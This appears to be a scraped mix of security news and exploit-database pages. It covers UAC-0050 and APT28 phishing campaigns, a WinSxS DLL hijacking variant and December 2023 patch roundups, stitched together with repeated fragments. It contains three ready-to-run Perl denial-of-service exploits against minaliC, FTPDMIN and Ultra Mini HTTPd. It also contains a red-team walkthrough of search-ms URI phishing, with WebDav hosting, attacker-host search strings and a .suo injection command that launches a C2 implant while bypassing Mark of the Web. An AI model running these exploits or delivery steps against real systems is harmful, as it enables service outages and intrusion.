The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software.
"The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in

Software Security / Malware

The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software.

"The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in a Wednesday report.

"However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability."

UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities via social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments.

In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed the adversary to a phishing campaign designed to deliver Remcos RAT.

Over the past few months, the same trojan has been distributed as part of at least three different phishing waves, with one such attack also leading to the deployment of an information stealer called Meduza Stealer.

The analysis from Uptycs is based on a LNK file it discovered on December 21, 2023. While the exact initial access vector is currently unknown, it's suspected to have involved phishing emails targeting Ukrainian military personnel that claim to advertise consultancy roles with the Israel Defense Forces (IDF).

The LNK file in question collects information regarding antivirus products installed on the target computer, and then proceeds to retrieve and execute an HTML application named "6.hta" from a remote server using mshta.exe, a Windows-native binary for running HTA files.

This step paves the way for a PowerShell script that unpacks another PowerShell script to download two files called "word\_update.exe" and "ofer.docx" from the domain new-tech-savvy\[.\]com.

Running word\_update.exe causes it to create a copy of itself with the name fmTask\_dbg.exe and establish persistence by creating a shortcut to the new executable in the Windows Startup folder.

The binary also employs unnamed pipes to facilitate the exchange of data between itself and a newly spawned child process for cmd.exe in order to ultimately decrypt and launch the Remcos RAT (version 4.9.2 Pro), which is capable of harvesting system data and cookies and login information from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome.

"Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems," the researchers said.

"Although not entirely new, this technique marks a significant leap in the sophistication of the group's strategies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT

minaliC version 2.0.0 suffers from a denial of service vulnerability.

    #!/usr/bin/perluse Socket;# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 03 january 2024# Vendor Homepage: http://minalic.sourceforge.net/# Download to demo: https://drive.google.com/file/d/1WoDbps6up2s5Xa40YXDSABRU9J17yRQd/view?usp=sharing# Notification vendor: No reported# Tested Version: minaliC 2.0.0# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data via method GET to web server.#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";my $junk = "\x41" x 245;my $host = "\x41" x 135;my $i=0;while ($i <= 3) {my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";my $sock;socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";my $addr = sockaddr_in($port, inet_aton($ip));connect($sock, $addr);send($sock, $buf, length($buf), 0);$i++;}    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print "***************************************************\n";      print "*       minaliC 2.0.0 - Denied of Service         *\n";      print "*                                                 *\n";      print "*            Coded by Fernando Mengali            *\n";      print "*                                                 *\n";      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";      print "*                                                 *\n";      print "***************************************************\n";  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated

minaliC 2.0.0 Denial Of Service

Any unprivileged, local user in Microsoft Windows can disclose whether a specific file, directory or registry key exists in the system or not, even if they do not have the open right to it or enumerate right to its parent.

Microsoft Windows Kernel Information Disclosure

FTPDMIN version 0.96 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: FTPDMIN 0.96 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 2024-01-01  
# Vendor Homepage: https://www.sentex.ca/~mwandel/ftpdmin/  
# Download to demo:  
https://drive.google.com/file/d/1CpfvaJbJVxR3HPWvcxIVipTaTj7RAaLd/view?usp=sharing  
# Notification vendor: Yes reported  
# Tested Version: FTPDMIN 0.96  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=q-CVJfYdd-g

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2  
and 3 (English).  
#For this exploit I have tried several strategies to increase reliability  
and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via  
FTP command RNFR.  
#The following request sends a large amount of data to the FTP server to  
process across command RNFR, the server will crash as soon as it is  
received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash  
the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

    intro();  
    main();

    print "[+] Exploiting... \n";

    my $buf = "\x41"x269;  
    my $point = "\x45\x2a\x42\x7b";  
    my $buf2 = "\x41"x126;

    my $payload = "RNFR ".$buf . $point . $buf2;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Can't connect to  
server: $@";

    $ftp->login("anonymous",'anonymous');

    $ftp->quot($payload);

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

   sub intro {  
      print "***************************************************\n";  
      print "*         FTPDMIN 0.96 - Denied of Service        *\n";  
      print "*                                                 *\n";  
      print "*            Coded by Fernando Mengali            *\n";  
      print "*                                                 *\n";  
      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";  
      print "*                                                 *\n";  
      print "***************************************************\n";  
  }

  sub main {

      our ($ip) = @ARGV;

      unless (defined($ip)) {

        print "             \nUsage: $0 <ip>                   \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

FTPDMIN 0.96 Denial Of Service

Ultra Mini HTTPd version 1.21 suffers from a denial of service vulnerability.

    # Exploit Title: Ultra Mini HTTPd 1.21 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 2024-01-01# Vendor Homepage: https://acme.com/# Software Link: https://acme.com/# Notification vendor: Yes reported# Tested Version: Ultra Mini HTTPd 1.21# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://www.youtube.com/watch?v=HWOGeg3e5As#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data via GET.#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";    my $buffer = "\x41"x192;    my $payload = 'A' x 5438 . $buffer;    my $i=0;    while (i < 1) {        my $socket = IO::Socket::INET->new(        PeerAddr => $ip,        PeerPort => $port,        Proto    => 'tcp',    ) or die "Can't connect!!!!! \n\n";    my $payload = "GET / $payload HTTP/1.1\r\nHost:$ip\r\n\r\n";    $socket->send($payload);    close($socket);    $i++;    }      print "[+] Exploited success!!!!!\n\n";     sub intro {      print "***************************************************\n";      print "*    Ultra Mini HTTPd 1.21 - Denied of Service    *\n";      print "*                                                 *\n";      print "*            Coded by Fernando Mengali            *\n";      print "*                                                 *\n";      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";      print "*                                                 *\n";      print "***************************************************\n";  }  sub main {      our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated.

Ultra Mini HTTPd 1.21 Denial Of Service

Microsoft search protocol enables clients to initiate connections against an enterprise search service such as SharePoint or WebDav. During these search connections the protocol server… 
Continue reading → Initial Access – search-ms URI Handler

Microsoft search protocol enables clients to initiate connections against an enterprise search service such as SharePoint or WebDav. During these search connections the protocol server will respond with a list of items which are relevant to the search query. The SOAP message protocol is used to format request and response messages during a search query over the HTTP or HTTPS protocol. When the _search-ms_ URI handler is used in Microsoft Edge in order to search a file in a target web server this will enforce Windows explorer to start in order to list the results. This behavior can be used in conjunction with phishing in order to enforce target users to visit arbitrary URL’s hosting malicious files in order to get initial access.

Microsoft is utilizing Mark of the Web (MotW) in Windows environments to indicate that a file is originated from the Internet. On that basis files are being prevented from download by Windows SmartScreen and prompt the user with an additional message about the risks of opening an non-trusted file. Trellix discovered that a threat actor is combining a chain of techniques in order to bypass Mark of the Web and trick the users to open malicious attachments from a WebDav server using the _ms-search_ protocol. Essentially, chaining Windows Search Protocol handler with WebDav and AppDomainManager Injection or with a programming file such as .NET can enable red teams to evade any warnings to the users, bypass controls during implant delivery for initial access as these do not apply Mark of the Web (MotW).

In order to mimic the threat actor approach a WebDav server is required that will host the arbitrary file. Executing the command below will initiate a WebDav server:

    wsgidav --port=80 --host=0.0.0.0 --root=. --auth=anonymous

WebDav Server

Querying the registry _HKEY\_CLASSES\_ROOT_ will identify all Microsoft handlers which can register a URL. For example using the protocol handler and the URL like _identifier://URL_ will cause Windows to call the registered application to handle the action.

Get-Item Registry::HKEY\_CLASSES\_ROOT\\ms-\* | Out-String | select-string -Pattern "URL" -SimpleMatch

Search URI Handler – Registry Search

In a red team scenario the following string will enforce Windows to connect to the remote WebDav server via the HTTP protocol, filter a specific file type (.sln) and hide the actual path with the _displayname_ value. A popup notification will appear to the user that the website is trying to open windows explorer. It should be noted that this will not work in other browsers like Firefox unless a browser redirection is utilized.

    search-ms:query=.sln&crumb=location:\\10.0.0.3\DavWWWRoot\application&displayname=pentestlaboratories

Search URL Handler – Edge

Since visual studio projects doesn’t apply Mark of the Web, therefore injecting an arbitrary command into the _.suo_ (Studio User Options) file will cause code execution if it is blend in with a visual studio solution project file. A proof of concept exists which can be used to perform the command injection.

    suo_exploit_test.exe input.suo injected.suo cmd /c C:\tmp\demon.x64.exe

Search URI Handler – .suo

Using a visual studio solution file will ignore MotW and therefore any warnings that the file is originated from the Internet or from SmartScreen will not presented to the user.

Search URL Handler – Visual Studio Solution

When the target user opens the solution file, visual studio will start as normal and the code will executed in the background.

Search URI Handler – Visual Studio

As a result a communication will established with the command and control framework.

Search URI Handler – Implant

It is not uncommon if the target user is a developer to have more rights compare to standard users. Therefore user permissions should be checked during situational awareness by running _whoami_ to determine the privileges of the user who executed the file.

Search URI Handler – whoami

It should be noted that the WebClient service will start (by default is not running in Windows 10) and therefore it could be chained with other active directory attacks (depending on the domain configuration) to perform elevation of privileges or lateral movement.

Search URI Handler – WebClient Service

An alternative approach could be to directly serve a malicious executable instead of a _.sln_ file.

Search URI Handler – Executable

However, in that occasion Mark of the Web will applied and a message will inform the user that the file is originated outside of the network and could harm the computer.

Search URI Handler – MotW

However, if the use ignores the message and choose to run the file an implant will received to the C2 framework.

Search URI Handler – Implant

Instead of using programming files, arbitrary office files could be also used as these will evade also any email filtering solutions.

    search-ms:query=.xlsx&crumb=location:\\10.0.0.3\DavWWWRoot\Update&displayname=Update

Search URI Handler – Excel

When windows explorer opens the computer will connect to the remote WebDav server which hosts the file and once the user opens the file code will executed.

Search URI Handler – Excel via WebDav

Office documents also accept URI’s and therefore could be used to trick the user to open the malicious attachment.

    ms-excel:ofv|u|http://10.0.0.3/Book1.xlsx

Excel Handler

In all of the cases pretext is necessary and important part of social engineering to convince the user to open the file. The above methods could be used as a method to deliver files in order to get initial access by evading common methods such as sending email attachments to users that might be prevented by the email filtering control.

**References**

1.  https://github.com/mar10/wsgidav
2.  https://github.com/moom825/visualstudio-suo-exploit
3.  https://twitter.com/hackerfantastic/status/1531793396423176193
4.  https://www.trellix.com/about/newsroom/stories/research/beyond-file-search-a-novel-method/
5.  https://badoption.eu/blog/2023/12/21/RedirectChain.html

**Post navigation**

Initial Access – search-ms URI Handler

Security researchers have detailed a new variant of a dynamic link library (DLL) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11.
The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL

Windows Security / Vulnerability

Security researchers have detailed a new variant of a dynamic link library (DLL) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11.

The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL search order hijacking technique," cybersecurity firm Security Joes said in a new report exclusively shared with The Hacker News.

In doing so, it allows adversaries to eliminate the need for elevated privileges when attempting to run nefarious code on a compromised machine as well as introduce potentially vulnerable binaries into the attack chain, as observed in the past.

DLL search order hijacking, as the name implies, involves gaming the search order used to load DLLs in order to execute malicious payloads for purposes of defense evasion, persistence, and privilege escalation.

Specifically, attacks exploiting the technique single out applications that do not specify the full path to the libraries they require, and instead, rely on a predefined search order to locate the necessary DLLs on disk.

Threat actors take advantage of this behavior by moving legitimate system binaries into non-standard directories that include malicious DLLs that are named after legitimate ones so that the library containing the attack code is picked up in place of the latter.

This, in turn, works because the process calling the DLL will search in the directory it's executing from first before recursively iterating through other locations in a particular order to locate and load the resource in question. To put it in other words, the search order is as follows -

1.  The directory from which the application is launched
2.  The folder "C:\\Windows\\System32"
3.  The folder "C:\\Windows\\System"
4.  The folder "C:\\Windows"
5.  The current working directory
6.  Directories listed in the system's PATH environment variable
7.  Directories listed in the user's PATH environment variable

The novel twist devised by Security Joes targets files located in the trusted "C:\\Windows\\WinSxS" folder. Short for Windows side-by-side, WinSxS is a critical Windows component that's used for the customization and updating of the operating system to ensure compatibility and integrity.

"This approach represents a novel application in cybersecurity: traditionally, attackers have largely relied on well-known techniques like DLL search order hijacking, a method that manipulates how Windows applications load external libraries and executables," Ido Naor, co-founder and CEO of Security Joes, said in a statement shared with The Hacker News.

"Our discovery diverges from this path, unveiling a more subtle and stealthy method of exploitation."

The idea, in a nutshell, is to find vulnerable binaries in the WinSxS folder (e.g., ngentask.exe and aspnet\_wp.exe) and combine it with the regular DLL search order hijacking methods by strategically placing a custom DLL with the same name as the legitimate DLL into an actor-controlled directory to achieve code execution.

As a result, simply executing a vulnerable file in the WinSxS folder by setting the custom folder containing the rogue DLL as the current directory is enough to trigger the execution of the DLL's contents without having to copy the executable from the WinSxS folder to it.

Security Joes warned that there could be additional binaries in the WinSxS folder that are susceptible to this kind of DLL search order hijacking, necessitating that organizations take adequate precautions to mitigate the exploitation method within their environments.

"Examine parent-child relationships between processes, with a specific focus on trusted binaries," the company said. "Monitor closely all the activities performed by the binaries residing in the WinSxS folder, focusing on both network communications and file operations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections

Plus: Apple shuts down a Flipper Zero Attack, Microsoft patches more than 30 vulnerabilities, and more critical updates for the last month of 2023.

December was a hectic month for updates as firms including Apple and Google rushed to get patches out to fix serious flaws in their products before the holiday break.

Enterprise software giants also issued their fair share of patches, with Atlassian and SAP squashing several critical bugs during December.

Here’s what you need to know about the important updates you might have missed during the month.

Apple iOS

In mid-December, Apple released iOS 17.2, a major point upgrade containing features such as the Journal app, as well as 12 security patches. Among the flaws fixed in iOS 17.2 is CVE-2023-42890, an issue in the WebKit browser engine that could allow an attacker to execute code.

Another flaw in the iPhone’s Kernel, tracked as CVE-2023-4291, could see an app break out of its secure sandbox, Apple wrote on its support page. Meanwhile, two vulnerabilities in ImageIO, CVE-2023-42898 and CVE-2023-42899, could lead to code execution.

The iOS 17.2 update also put a mechanism in place to prevent a Bluetooth attack using a penetration testing device called Flipper Zero, according to tests by ZDNET and 9to5Mac. The annoying denial of service cyber-assault could cause a flurry of pop ups to appear on an iPhone and eventually lock up the device.

Apple also released iOS 16.7.3, Safari 17.2, macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2, tvOS 17.2 and watchOS 10.2.

Just one week after releasing iOS 17.2, Apple issued iOS 17.2.1 and iOS 16.7.4 for older devices, alongside macOS Sonoma 14.2.1. The surprise iPhone update contains unspecified bug and security fixes, while the macOS patch fixes a single flaw tracked as CVE-2023-42940.

Google Android

The Google Android December Security Bulletin was a hefty one, fixing nearly 100 security issues. The update includes patches for two critical issues in the Framework, the most severe of which could lead to remote escalation of privilege with no additional privileges needed. User interaction is not needed for exploitation, Google said.

CVE-2023-40088 is a critical flaw in the System that could lead to remote code execution, while CVE-2023-40078 is an elevation of privilege bug rated as having a high impact.

Google has also issued an update for its smart device WearOS platform, fixing CVE-2023-40094, an elevation of privilege flaw. The Pixel Security Bulletin has not been posted at the time of writing.

Google Chrome

Google ended a bumper December of updates in style with an emergency fix for its Chrome browser. The eighth zero-day vulnerability impacting Chrome in 2024, CVE-2023-7024 is a heap buffer overflow issue in the open source WebRTC component. Google is “aware that an exploit for CVE-2023-7024 exists in the wild,” the browser maker said in an advisory.

It wasn’t the first fix released by Google in December. The software giant also issued a Chrome patch mid-month to fix nine security issues. Of the flaws reported by external researchers, five are rated as having a high severity, including CVE-2023-6702, a type confusion flaw in V8, and four use-after-free bugs.

Earlier in the month Google released Chrome 120, fixing 10 security flaws, including two rated as having a high severity. CVE-2023-6508 is a use-after-free bug in Media Stream, while CVE-2023-6509 is a use-after-free issue in Side Panel Search.

Microsoft

Microsoft’s December Patch Tuesday fixes over 30 vulnerabilities including several remote code execution (RCE) flaws. Among the critical fixes is CVE-2023-36019, a spoofing vulnerability in Microsoft Power Platform Connector with a CVSS score of 9.6. The issue could see an attacker manipulate a malicious link, app, or file to trick the victim. However, you would have to click on a specially crafted URL to be compromised.

Meanwhile, CVE-2023-35628 is a Windows MSHTML Platform RCE bug rated as critical with a CVSS score of 8.1. “The attacker could exploit this vulnerability by sending a specially crafted email which triggers automatically when it is retrieved and processed by the Outlook client,” Microsoft said, adding that this could lead to exploitation before the email is viewed in the Preview Pane.

It was a fairly light Patch Tuesday, and none of the issues fixed in the month’s update cycle are known to have been exploited, but it still makes sense to apply the fixes as soon as you can.

Mozilla Firefox

Mozilla has fixed 18 security vulnerabilities in its Firefox browser, a third of which are rated as having a high severity. Of these, CVE-2023-6856 is a heap-buffer-overflow issue affecting WebGL DrawElementsInstanced method with Mesa VM driver that could allow an attacker to perform remote code execution and sandbox escape.

Meanwhile, Mozilla has also fixed memory safety bugs tracked as CVE-2023-6864 and CVE-2023-6873. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort \[they\] could have been exploited to run arbitrary code,” Mozilla said.

Apache

The Apache Software Foundation has issued a patch for a flaw in its Struts 2 open source developer framework. Tracked as CVE-2023-50164, the issue is rated as critical with a CVSS score of 9.8.

Using the vulnerability, an attacker could manipulate file upload parameters to enable paths traversal. Under some circumstances, this could lead to uploading a malicious file and be used to perform RCE, according to a security advisory.

To fix the flaw, it’s important to upgrade to Struts 2.5.33 or Struts 6.3.0.2 as soon as possible.

Atlassian

Enterprise software giant Atlassian has issued a patch to fix critical RCE vulnerabilities in its Confluence Data Center and Server. Tracked as CVE-2023-22522, the template injection vulnerability allows an authenticated attacker to inject unsafe user input into a Confluence page. “Using this approach, an attacker is able to achieve RCE on an affected instance,” Atlassian said in an advisory.

Marked as critical with a CVSS score of 9, the bug affects all versions including and after 4.0.0 of Confluence Data Center and Server. Atlassian “recommends patching to the latest version or a fixed LTS version” to address the issue.

Other patches released by Atlassian during the month include a fix for an RCE vulnerability in the Atlassian macOS app, an RCE bug in Assets Discovery, and a SnakeYAML library RCE issue impacting multiple products.

SAP

Business software maker SAP has released its December Security Patch Day, fixing several serious security flaws. The most critical, with a CVSS score of 9.1, are four escalation-of-privilege bugs in SAP Business Technology Platform tracked as CVE-2023-49583, CVE-2023-50422, CVE-2023-50423, and CVE-2023-50424.

“It allows an unauthenticated attacker to obtain arbitrary permissions within the application leading to high impact on the application’s confidentiality and integrity,” security firm Onapsis said.

Meanwhile, CVE-2023-42481 is an improper access control vulnerability in SAP Commerce Cloud with a CVSS score of 8.1. “This allows a user who is actually blocked to regain access to the application, leading to considerable impact on confidentiality and integrity,” according to Onapsis.

Google Fixes Nearly 100 Android Security Issues

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information.
The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information.

The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities with email messages urging recipients to click on a link to view a document.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

However, to the contrary, the links redirect to malicious web resources that abuse JavaScript and the "search-ms:" URI protocol handler to drop a Windows shortcut file (LNK) that launches PowerShell commands to activate an infection chain for a new malware known as MASEPIE.

MASEPIE is a Python-based tool to download/upload files and execute commands, with communications with the command-and-control (C2) server taking place over an encrypted channel using the TCP protocol.

The attacks further pave the way for the deployment of additional malware, including a PowerShell script called STEELHOOK that's capable of harvesting web browser data and exporting it to an actor-controlled server in Base64-encoded format.

Also delivered is a C#-based backdoor dubbed OCEANMAP that's designed to execute commands using cmd.exe.

"The IMAP protocol is used as a control channel," CERT-UA said, adding persistence is achieved by creating a URL file named "VMSearch.url" in the Windows Startup folder.

"Commands, in Base64-encoded form, are contained in the 'Drafts' of the corresponding email directories; each of the drafts contains the name of the computer, the name of the user and the version of the OS. The results of the commands are stored in the inbox directory."

The agency further pointed out that reconnaissance and lateral movement activities are carried out within an hour of the initial compromise by taking advantage of tools like Impacket and SMBExec.

The disclosure comes weeks after IBM X-Force revealed APT28's use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace.

In recent weeks, the prolific Kremlin-backed hacking group has also been attributed to the exploitation of a now-patched critical security flaw in its Outlook email service (CVE-2023-23397, CVSS score: 9.8) to gain unauthorized access to victims' accounts within Exchange servers.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows